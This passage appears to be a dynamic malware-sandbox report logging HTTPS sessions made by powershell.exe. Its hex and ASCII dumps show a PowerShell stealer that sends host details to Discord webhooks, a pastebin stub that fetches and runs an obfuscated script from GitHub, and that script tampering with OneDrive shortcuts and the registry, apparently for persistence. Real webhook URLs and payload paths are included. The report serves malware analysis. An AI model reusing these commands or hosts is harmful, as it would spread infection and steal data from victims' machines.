                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                            2024-10-15 14:14:35 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                            2024-10-15 14:14:35 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                            2024-10-15 14:14:35 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                            2024-10-15 14:14:35 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.649841162.159.136.2324433576C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:14:36 UTC311OUTPOST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Content-Type: application/json
                                            Host: discord.com
                                            Content-Length: 221
                                            Connection: Keep-Alive
                                            2024-10-15 14:14:36 UTC221OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 63 72 7a 63 72 70 74 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 37 5a 44 36 34 35 58 59 59 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                            Data Ascii: { "content": "**user** has joined - crzcrpt\n----------------------------------\n**GPU:** 7ZD645XYY\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                            2024-10-15 14:14:36 UTC1263INHTTP/1.1 404 Not Found
                                            Date: Tue, 15 Oct 2024 14:14:36 GMT
                                            Content-Type: application/json
                                            Content-Length: 45
                                            Connection: close
                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1729001677
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wPxKt9MG9bJJOrzM1500muY%2BGA9HhxKiTXV%2F6SRNrDZKmEtQMCpnr%2BLxq%2Flzx7h%2F0qRKUX3%2FqN01lwL97SmUM1ror4pn6HVKqaEn0zabLRvbPP2eqvgYxu%2BmVxdU"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Set-Cookie: __cfruid=bbe5fda4ea418ad36a12c7c3c77b47322380c754-1729001676; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: _cfuvid=IiF0HC0Z.L8CyYwgGiPOb8cnN7yQrD_mfCVJfeaiDYU-1729001676479-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Server: cloudflare
                                            CF-RAY: 8d306a9d39636c70-DFW
                                            2024-10-15 14:14:36 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.649849104.20.3.2354436976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:14:40 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:14:41 UTC398INHTTP/1.1 200 OK
                                            Date: Tue, 15 Oct 2024 14:14:41 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1;mode=block
                                            cache-control: public, max-age=1801
                                            CF-Cache-Status: HIT
                                            Age: 1331
                                            Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                            Server: cloudflare
                                            CF-RAY: 8d306aba6a71cb75-DFW
                                            2024-10-15 14:14:41 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                            Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                            2024-10-15 14:14:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.649853185.199.108.1334436976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:14:42 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:14:43 UTC900INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Length: 7508
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:14:42 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdfw8210023-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 1
                                            X-Timer: S1729001683.968748,VS0,VE1
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: be95e1e5eba7f500fe0702aab655665a1946b1bf
                                            Expires: Tue, 15 Oct 2024 14:19:42 GMT
                                            Source-Age: 8
                                            2024-10-15 14:14:43 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                            Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                            2024-10-15 14:14:43 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                            Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                            2024-10-15 14:14:43 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                            Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                            2024-10-15 14:14:43 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                            Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                            2024-10-15 14:14:43 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                            Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                            2024-10-15 14:14:43 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                            Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.649865162.159.136.2324436272C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:14:48 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Content-Type: application/json
                                            Host: discord.com
                                            Content-Length: 302
                                            Connection: Keep-Alive
                                            2024-10-15 14:14:49 UTC302OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 65 6e 67 69 6e 65 65 72 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 37 5a 44 36 34 35 58 59 59 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41
                                            Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** 7ZD645XYY\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UA
                                            2024-10-15 14:14:49 UTC1257INHTTP/1.1 404 Not Found
                                            Date: Tue, 15 Oct 2024 14:14:49 GMT
                                            Content-Type: application/json
                                            Content-Length: 45
                                            Connection: close
                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                            x-ratelimit-limit: 5
                                            x-ratelimit-remaining: 4
                                            x-ratelimit-reset: 1729001690
                                            x-ratelimit-reset-after: 1
                                            via: 1.1 google
                                            alt-svc: h3=":443"; ma=86400
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RBg5VpEGJksBj88e%2FpF1HTCxBlyQZ8LQ%2FKyjMAj0IYkXAb2Nh997Xx0%2BtQdpbz0QycVAzXl3B4xwyHDDRJ3XJLwGilnrJ8nOMl5hyZIEiXrzyxUtU27U0%2B4mqqIC"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            X-Content-Type-Options: nosniff
                                            Set-Cookie: __cfruid=2bb82488d4e515ff095380bb0caf5eeea8f3ffd5-1729001689; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                            Set-Cookie: _cfuvid=.q7tJufObXaAyTYGfSoGaePTBWN0eKpwAiP3IdCiRj0-1729001689157-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                            Server: cloudflare
                                            CF-RAY: 8d306aecaadee922-DFW
                                            2024-10-15 14:14:49 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                            Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.649895162.159.136.2324436976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-15 14:14:56 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Content-Type: application/json
                                            Host: discord.com
                                            Content-Length: 302
                                            Connection: Keep-Alive
